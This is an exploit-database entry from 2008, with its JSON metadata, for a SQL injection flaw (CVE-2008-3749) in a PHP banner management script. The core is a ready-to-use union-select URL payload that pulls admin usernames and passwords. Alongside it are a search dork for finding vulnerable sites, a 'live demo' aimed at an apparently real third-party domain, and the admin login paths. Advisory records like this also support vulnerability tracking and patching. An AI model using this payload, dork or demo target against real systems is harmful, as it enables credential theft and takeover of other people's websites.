ID EDB-ID:6276
Type exploitdb
Reporter S.W.A.T.
Modified 2008-08-19T00:00:00
Description
Banner Management Script (tr.php id) Remote SQL Injection Vulnerability. CVE-2008-3749. Web application exploit for the PHP platform.
|___________________________________________________|
|
| Banner Management Script (tr.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------S.W.A.T.----------------------|
|
| Author: S.W.A.T.
|
| Home : www.svvat.ir
|
| email: svvateam[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
| script : http://www.yourfreeworld.com/script/bannermanagementscript.php
|
| DorK : inurl:tr.php?id= Banner
|___________________________________________________|
Exploit:
________
www.[target].com/Script/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
L!VE DEMO:
_________
http://www.downlinegoldmine.com/bannermanagerpro/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
____________
Admin Login :
www.[target].com/Script/admin.php
or
www.[target].com/Script/adadmin.php
# milw0rm.com [2008-08-19]
{"bulletinFamily": "exploit", "id": "EDB-ID:6276", "cvelist": ["CVE-2008-3749"], "modified": "2008-08-19T00:00:00", "lastseen": "2016-01-31T23:33:10", "edition": 1, "sourceData": "|___________________________________________________|\n|\n| Banner Management Script (tr.php id) Remote SQL Injection Vulnerability\n|\n|___________________________________________________\n|---------------------S.W.A.T.----------------------|\n|\n| Author: S.W.A.T.\n|\n| Home : www.svvat.ir\n|\n| email: svvateam[at]Yahoo[DoT]com\n|\n|\n|___________________________________________________\n| |\n|\n| script : http://www.yourfreeworld.com/script/bannermanagementscript.php\n|\n| DorK : inurl:tr.php?id= Banner\n|___________________________________________________|\n\nExploit:\n________\n\n\n\nwww.[target].com/Script/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--\n\n\n\n\n\n\nL!VE DEMO:\n_________\n\n\nhttp://www.downlinegoldmine.com/bannermanagerpro/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--\n\n\n____________\n\nAdmin Login :\n\nwww.[target].com/Script/admin.php\n\nor\n\nwww.[target].com/Script/adadmin.php\n\n# milw0rm.com [2008-08-19]\n", "published": "2008-08-19T00:00:00", "href": "https://www.exploit-db.com/exploits/6276/", "osvdbidlist": ["47579"], "reporter": "S.W.A.T.", "hash": "2eb0210fdc3c2ce3a7bb1c6599a2cf370f7f3a9b4eae4780cb369e0aaf263a9a", "title": "Banner Management Script tr.php id Remote SQL Injection Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Banner Management Script (tr.php id) Remote SQL Injection Vulnerability. CVE-2008-3749. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6276/", "enchantments": {"vulnersScore": 3.5}}
{"result": {"cve": [{"id": "CVE-2008-3749", "type": "cve", "title": "CVE-2008-3749", "description": "SQL injection vulnerability in tr.php in YourFreeWorld Banner Management Script allows remote attackers to execute arbitrary SQL commands via the id parameter.", "published": "2008-08-21T13:41:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3749", "cvelist": ["CVE-2008-3749"], "lastseen": "2017-09-29T14:26:04"}]}}